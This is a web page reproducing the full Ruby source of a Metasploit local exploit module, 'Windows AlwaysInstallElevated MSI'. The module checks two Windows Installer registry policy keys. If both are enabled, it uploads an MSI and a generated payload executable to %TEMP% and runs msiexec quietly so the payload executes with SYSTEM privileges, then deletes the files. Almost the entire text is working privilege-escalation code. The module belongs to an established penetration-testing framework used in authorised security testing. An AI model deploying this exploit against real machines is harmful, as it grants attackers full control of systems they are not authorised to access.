扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' require 'msf/core/post/common' require 'msf/core/post/file' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Registry def initialize(info={}) super(update_info(info, { 'Name'=> 'Windows AlwaysInstallElevated MSI', 'Description'=> %q{ This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/exploits/exec_payload.msi with the WiX source file under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply executes payload.exe within the same folder. The MSI may not execute succesfully successive times, but may be able to get around this by regenerating the MSI. MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs light exec_payload.wixobj }, 'License' => MSF_LICENSE, 'Author'=> [ 'Ben Campbell', 'Parvez Anwar' # discovery?/inspiration ], 'Arch'=> [ ARCH_X86, ARCH_X86_64 ], 'Platform'=> [ 'win' ], 'SessionTypes'=> [ 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'thread', 'InitialAutoRunScript' => 'migrate -k -f' }, 'Targets' => [ [ 'Windows', { } ], ], 'References'=> [ [ 'URL', 'http://www.greyhathacker.net/?p=185' ], [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ], [ 'URL', 'http://wix.sourceforge.net'] , ], 'DisclosureDate'=> 'Mar 18 2010', 'DefaultTarget' => 0 })) register_advanced_options([ OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]), OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true]) ], self.class) end def check install_elevated = "AlwaysInstallElevated" installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer" hkcu = "HKEY_CURRENT_USER\\#{installer}" hklm = "HKEY_LOCAL_MACHINE\\#{installer}" local_machine_value = registry_getvaldata(hklm,install_elevated) if local_machine_value.nil? print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif local_machine_value == 0 print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) end if current_user_value.nil? print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif current_user_value == 0 print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable end end def cleanup if not @executed return end begin print_status("Deleting MSI...") file_rm(@msi_destination) rescue Rex::Post::Meterpreter::RequestError => e print_error(e.to_s) print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.") end begin print_status("Deleting Payload...") file_rm(@payload_destination) rescue Rex::Post::Meterpreter::RequestError => e print_error(e.to_s) print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.") end end def exploit if check != Msf::Exploit::CheckCode::Vulnerable @executed = false return end @executed = true msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi") # Upload MSI @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped print_status("Uploading the MSI to #{@msi_destination} ...") #upload_file - ::File.read doesn't appear to work in windows... source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) } write_file(@msi_destination, source) # Upload payload payload = generate_payload_exe @payload_destination = expand_path("%TEMP%\\payload.exe").strip print_status("Uploading the Payload to #{@payload_destination} ...") write_file(@payload_destination, payload) # Execute MSI print_status("Executing MSI...") if datastore['LOG_FILE'].nil? logging = "" else logging = "/l* #{datastore['LOG_FILE']} " end if datastore['QUIET'] quiet = "/quiet " else quiet = "" end cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}" vprint_status("Executing: #{cmd}") begin result = cmd_exec(cmd) rescue Rex::TimeoutError vprint_status("Execution timed out.") end vprint_status("MSI command-line feedback: #{result}") end end |
体验盒子
